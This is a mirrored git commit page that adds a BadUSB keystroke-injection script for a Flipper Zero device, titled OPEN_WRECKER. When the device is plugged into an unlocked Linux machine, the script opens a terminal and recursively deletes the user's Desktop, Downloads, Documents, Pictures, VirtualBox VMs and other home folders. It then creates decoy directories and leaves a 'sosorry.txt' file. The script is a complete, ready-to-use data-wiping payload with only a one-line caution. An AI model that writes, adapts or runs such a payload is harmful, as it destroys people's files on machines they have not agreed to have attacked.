mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 14:30:21 +00:00
Merge pull request #373 from FLIZZ3R/patch-1
Create Open_WreckerV1_Badusb_Linux
This commit is contained in:
commit
886311b097
21
Open_WreckerV1_Badusb_Linux
Normal file
21
Open_WreckerV1_Badusb_Linux
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
REM Author: FLIZZ3R
|
||||||
|
REM TITLE: OPEN_WRECKER
|
||||||
|
REM OBJECTIVE: wipe open linux machines Directories then create dummy directories and sorry text file
|
||||||
|
REM Note from UberGuidoz - DESTRUCTIVE! USE WITH CAUTION.
|
||||||
|
DELAY 500
|
||||||
|
WINDOWS d
|
||||||
|
DELAY 300
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 1500
|
||||||
|
STRING rm -r Desktop Downloads Pictures snap Documents Music Public Templates 'VirtualBox VMs'
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING mkdir Deskop downloadz Pics Dox Music Public TEMPS Vms
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd Deskop
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING touch sosorry.txt
|
||||||
|
ENTER
|
||||||
|
ALT F4
|
Loading…
Reference in New Issue
Block a user